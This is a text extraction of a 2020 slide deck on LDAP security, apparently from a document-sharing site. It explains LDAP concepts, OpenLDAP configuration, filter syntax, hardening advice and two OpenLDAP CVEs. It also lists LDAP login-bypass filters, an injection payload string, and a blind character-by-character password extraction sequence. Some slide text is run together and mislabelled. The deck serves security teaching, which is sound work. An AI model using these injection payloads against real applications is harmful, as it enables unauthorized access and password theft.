Upload
others
View
26
Download
0
Embed Size (px)
Citation preview
LDAP SecurityEmre ÖVÜNÇ
Who am I ?
• Attack Developer – Picus Security • Security Researcher - Synack
• OSCE – OSCP – OSWP• LFCE – LFCS – ISO27001 LA
• https://github.com/EmreOvunc• https://twitter.com/EmreOvunc
Lightweight Directory Access Protocol
• TCP/IP
• Client – Server
• X.500 Protocol (1988-1993) | OSI
What is LDAP ?
• Protocol
• Database• Organizations• Units• People• Resources• Devices
• Authentication mechanism
Aim ?
• Access control• Privacy• Security• Authentication
• User management• Delegation• Rights
• Scaling
OpenLDAP
Open-source Free BSD-
License
OpenLDAP Components
• Slapd• Daemon• Receives connections
• Libraries & Utilities
• Client
LDAP Server
Ldap-utils Slapd Phpldapadmin Apache2 Bind9
LDAP Server
Ldap-utils Slapd Phpldapadmin Apache2 Bind9
LDAP Server Configuration
Search Parameters
ldapsearch –H ldap://172.16.155.128 –D ”cn=admin,dc=ovunc,dc=local” –W
-H: LDAP Uniform Resource Identifier(s)-D: bind DN-W: prompt for bind password
DC: domain componentDN: distinguished nameCN: common nameOU: organizational unit nameUID: user id
LDAP Anonymous Authentication
LDAP Simple Authentication
LDAP Configuration
LDAP Simple Authentication
LDAP Anonymous Authentication
LDAP Configuration
LDAP Anonymous Authentication
Nmap LDAP Enumeration
Nmap LDAP Enumeration
Nmap LDAP Bruteforcing
LDAP Filters
Operator Description Example
= Exactly match cn=admin
* Indicates zero or more character
ou=*
>= Greater than or equal uid >=
<= Less than or equal uid >=
=* One or more values cn=*
& And (&(filter)(filter(filter)
| Or (!(filter)(filter(filter)
! Not (!(filter))
LDAP Filters Example
• (&(objectClass=group)(cn=admin))
• (&(objectClass=posix)(cn=*team*))
• (&(objectClass=inetOrgPerson)(memberOf=cn=Admins,ou=redteam))
LDAP Web Application
<input type="text" name="user">Enter the username</input>
ldap_query = “(cn=" + $user + ")”
run(ldap_query)
???
LDAP Web Login Bypass
• (&(user=*)(password=*))
• (&(user=*))%00
• (&(user=*)(&))(password=*))
LDAP Injection Payloads
**)(&*))%00*()|%26'*()|&'*(|(mail=*))*(|(objectclass=*))*)(uid=*))(|(uid=**/*
LDAP Injection
(&(sn=admin)(password=*))(&(sn= admin)(password=a*))(&(sn= admin)(password=b*))
...(&(sn= admin)(password=m*))(&(sn= admin)(password=my*))
…(&(sn=admin)(password=myPassw0rd))
LDAP Injection Question ?
(&(objectClass=[class name])(ou=[unit name]))
(&(objectClass=posix)(ou=redteam))
LDAP Injection Answer
(&(objectClass=[class name])(ou=[unit name]))
(&(objectClass=*)(objectClass=*)(ou=*))
(&(objectClass=*)(objectClass=*) =*))(&(objectClass=foo)( ou=*))
(&(objectClass=*)(objectClass=*))(&(objectClass=people)(ou=redteam))
LDAP Injection Question ?
(&(deviceid=[id])(cn=[device name]))
(&(deviceid=34)(cn=nasbackup))
LDAP Injection Answer
(&(deviceid=[id])(cn=[device name]))
(&(deviceid=34)(ou=a*)(cn=nasbackup))(&(deviceid=34)(ou=b*)(cn=nasbackup))…(&(deviceid=34)(ou=re*)(cn=nasbackup))…(&(deviceid=34)(ou=redteam)(cn=nasbackup))
LDAP Hardening
Input validation (ldap queries)
Least privilege (users & devices)
AppArmor & SELinux configurations
LDAPs (secure connection)
Backup (encrypt & sign)
LDAP Server Hardening
Reject requests;No password,Null password,Unauthenticated,Anonymous users/sessions.
Do not use:SHA-1,LDAPv2,Weak passwords.
• OpenLDAP before 2.4.48
• Administrator delegation -> rootDN
• Slapd service• Authorization
• CVSS 4.9 (NVD)
CVE-2019-13057
• OpenLDAP 2.x before 2.4.48
• SASL authentication• Session Encryption
• ACL configuration• Successful authorization
(different user)
• CVSS 7.5 (NVD)
CVE-2019-13565
Lab
LDAP Lab Objects
LDAP Lab Objects
Organization: redteam
Organization Unit: people
Posix Group: nettim
Users: admin, bob
Demo Time
LDAP Tool J
• git clone https://github.com/EmreOvunc/eLdap-Ldap-Search-and-Filter.git
• cd eLdap-Ldap-Search-and-Filter • sudo pip3 install virtualenv• source myvenv/bin/activate • python3 manage.py runserver
LDAP Tool Vuln.
LDAP Tool Attack… not yet!
References
• https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
• https://ldap.com/ldap-filters/
• https://www.cvedetails.com/vulnerability-list/vendor_id-439/Openldap.html
LDAP SecurityEmre ÖVÜNÇ
[email protected] 16/04/2020